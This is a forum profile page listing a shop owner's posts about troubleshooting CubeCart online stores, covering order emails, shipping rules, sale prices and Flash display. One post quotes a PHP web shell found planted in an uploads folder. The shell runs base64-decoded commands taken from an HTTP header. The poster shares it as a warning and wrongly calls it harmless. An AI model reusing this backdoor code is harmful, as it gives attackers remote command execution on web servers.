Jump to content

sleepyfrog

Member
  • Posts

    83
  • Joined

  • Last visited

Everything posted by sleepyfrog

  1. Does anyone know how I can stop the store sending out automatic emails - having a problem with the store randomly cancelling orders and emailing customers - even weeks after the goods have been shipped! - so need to disable the feature until we can locate the problem. Thanks
  2. I had v4.3.0 installed but it got hacked and I couldn't clean it up. I therefore installed 4.3.8 instead, and seems to work ok with all the previous store data but something wierd happening on all the pagination links. When you click on the links to view previous pages in any of the admin screens it jumps you to the install mod section, even though the links are correct, eg http://www.XXX.co.uk/admin.php?_g=orders/i...ndex&page=2 Any ideas? Thanks
  3. Cause of the problem: The site had been created within a sub-folder of a parent company as the have 3 stores, eg www.parentcompany.com/ladspants/ With ladspants.com being a forwarding domain. Using this URL and the ladspants one worked in most browsers. However in some the forwarding was confusing the code and removing the buy now buttons and stopping the shopping cart from accepting goods. Moving the store to it's own webspace on ladspants.com to get rid of the forwarding resolved all the problems.
  4. Find the solution: I had moved the store from a sub-domain to it's own domain. Consequently, in the includes/global.ini.php file I had stripped out the old Root information from $glob['rootRel'] = '/organic/'; to $glob['rootRel'] = ''; but I should have left in one of the '/' s $glob['rootRel'] = '/';
  5. This worked for me (felt soooooo stupid) - but may not be the solution to your problem. I had moved the store from a sub-domain to it's own domain. Consequently, in the includes/global.ini.php file I had stripped out the old Root information from $glob['rootRel'] = '/organic/'; to $glob['rootRel'] = ''; but I should have left in one of the '/' s $glob['rootRel'] = '/'; Egg on face or what!
  6. Can you explain exactly how you fixed? Having same problem after moving store from one domain name to another and resetting licences etc
  7. SAme problem here - any solution?
  8. Thanks Could you please try again to add products to the basket at www.ladspants.com? Again, thanks for your help Regards Carol
  9. Wierd happenings. Had reports that a couple of customers are logging onto the website and finding that the Buy Now and View Cart buttons have completely dissappeared. Cannot replicate the issue, and Browser Shots shows no obvious problems - http://browsershots.org/http://www.8ventur...ith/cat_10.html According to the customer: "couldn't find a " buy it now " box on your web site...I have three PC 's here at home..one of them is an almost new state of the art Sony Vaio laptop..I have checked them all re cookies, temp files and Java and they are all spot on. They are all on Internet Explorer 7 and none of them display a " buy it now box " on your web page. I am certain that if I cannot see a box...then other IE 7 users will be having the same problem" Could I therefore ask the community to: a) please check www.ladspants.com and let me know if you get the same result, and what browser you have give any idea where the problem could lie My first thought was cookies or javascript, but the customer states these are set ok Many thanks Carol
  10. This concerns the automated emails sent from the store confirming order, order status change, password reminders etc. Does anyone know how to change to Rich Text/html format, as my client would like to include a banner at the bottom of each one. Thanks
  11. Ignore - Protx at fault not CC
  12. Problem with cubecart 4.3.3 If Allow dispatch to address other than invoice address? set to 'No' in General settings everything ok in checkout with delivery address being the same as the invoice address If, however, I set it to yes, when you go through the checkout the invoice address is the one of the person logged in, but the delivery address is that of the person who was logged in previously. This happens in both IE and Firefox and over several machines
  13. Has there been any update on this - having problems as N0.2 - orders being cancelled. However, unrelated orders, ie orders from other people previously completed, are also being cancelled.
  14. I have a problem with the shopping card resetting itself / overwriting products. It will add a single product ok, but if you try and add a second product it just overwrites the first. Any ideas where to look to resolve the problem? Running 4.3.3
  15. The iframe was put in to correct the problem If the link was to a document or cart, the index page reloaded, and therefore reloaded the flash file and the movie would start playing again. If it was a link through the main navigation it seems that the index page was not fully reloading, and therefore the movie wasn't being reloaded/started again - hence the white square To resolve it I had to place an iframe over the code so that it forced a reload of the file. Ones who don't support iframe should see the original embedded code
  16. I have included a Flash animation in the global/index.tpl and cart.tpl files, which works perfectly for me on all pages. However, my client can only see the flash on the home page - when he goes into a sub page the flash image is replaced by a white box. He is running Windows Vista and IE7 I told him to clear his cache files but he says this makes no difference. He also says it is happening on his sister's laptop and another machine he tried. I have tried everything I can think of - to redoing and renaming the swf file, adding a no-cache command to the bottom of the template files, getting him to reinstall flash - but still no joy. Has anyone else come across this? I would be grateful if you could check out http://www.heartofenglandbutterflies.com/index.php and see if it does the same for you - ie works on the home page but not when you click on the navigation on the left hand side. Otherwise anyone have any other ideas why this could be happening? It's driving me nuts! Thanks
  17. The file .moo.php.fla appeared in my images/uploads folder The file contains <?php error_reporting(0);${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))}.${print(_code_)} ?> Which seems to just print out the writable status of the folder I have deleted the file but want to warn other people in case it is a hacker targetting cubecart installs
  18. V4.3.0 When you click on Upload Images it tries to open http : // www .***/admin/includes/rte/editor/filemanager/browser/default/browser.php?Type=uploads&Connector=connectors/php/connector.php&nullLink=1 [ignore spaces - put in to stop this editor abreviating the link] But get a page not found error message. Looked on server and there is no browser.php - just browser.html Changed the link to browser.html instead but then just get the XML error message - which has been reported several times but no solution given. Also, when you click on Manage Images only a handful are shown, when there are over a hundred on the server.
  19. 2 problems: First: I want to be able to set the Per Category shipment amount for the top category - at the moment it will only work if I set shipping for each individual category. ie each top level category is a separate supplier who charge a set amount, whatever the items ordered. At the moment I have to set the shipping for every category, as setting it for the top level one only doesn't work. Second: Category A supplier charges £50 Category B supplier also charges £50 However, if someone orders from category A and category B they are only being charged £50 - not £100. I need it so the system will treat each top category individually. Any help would be appreciated as this is an urgent problem.
  20. I want to show a sale price of normal less 15% on all products in one category, and 20% in another. Using the Update Prices by Category doesn't work: General > Locale Settings > Sale Mode = Percentage off all prices ... doesn't work as it does what it says - takes 20% off all prices regardless of category. General > Locale Settings > Sale Mode = Individual sale prices per item doesn't work. tried this setting, then using Update Prices by Category but nothing happens - no sale price is entered Obviously you have to put in a sale value first to be able to update the prices en masse - this seems to miss the point of being able to change the prices by category. Is there any way of getting CC to calculate the Sale Price without having to manually go through all the products again? **************** Have now worked this out myself and re-written the code so that you have 3 options instead of 2: Increase/Decrease existing Normal (Retail) Price Set sale price based on Normal Price (no need to have a sale price in there already) Increase/decrease existing sale price If anyone wants to know how (for a small fee) pm me and I send details.
  21. Is there any way to allocate a whole category's items into another category? I have 76 products listed in a main category. These each have to be placed in up to 25 other categories. Going into each item individually through the 'manage categories' options is a complete pain - especially as the popup window refreshes to the top when you select a category. Is there any way to say 'copy all items in category x to category y' If not maybe this can be added to the Wish List ***** I have now managed to create a script to do this - it clones all the items in one category to another. It's for sale on the CubeCart Mods Site
  22. Products need to be in multiple categories - sometimes up to 15 different ones When adding products using the 'Manage Categories' option it is a pain when the screen refreshes and jumps to the top of the list after adding a category. Does anyone know how to disable this so that it stays at the same place on the screen so you don't have to keep scrolling down to do each category in turn. Especially annoying when categories spread over several pages.
  23. I'd like to have more than one image for a category, so that they all come up at the top of the 'View Cateory' page (styleTemplates/content/viewCat.tpl) before the list of products in that category Does anyone know how to do this or if there's a MOD Thanks
  24. Have checked but no mods. Have submitted a bug report. Product options aren't input as a percentage. ie RRP of product is £100 Blue is £110 I enter £100, which gets discounted to £80 But for the £10 difference I have to work out what is 80% and input that as the colour option - £8 If the product then goes up to £110 no problem - discount automatically changed. But if Blue option is £122, this is now £12 difference, so I have to manually go in and change the £8 to 80% of £12 = £9.60 Wouldn't be so bad on a few products, but is going to be a nightmare when the store will have over 1000 items, each with either 2, 3 or 4 options.
×
×
  • Create New...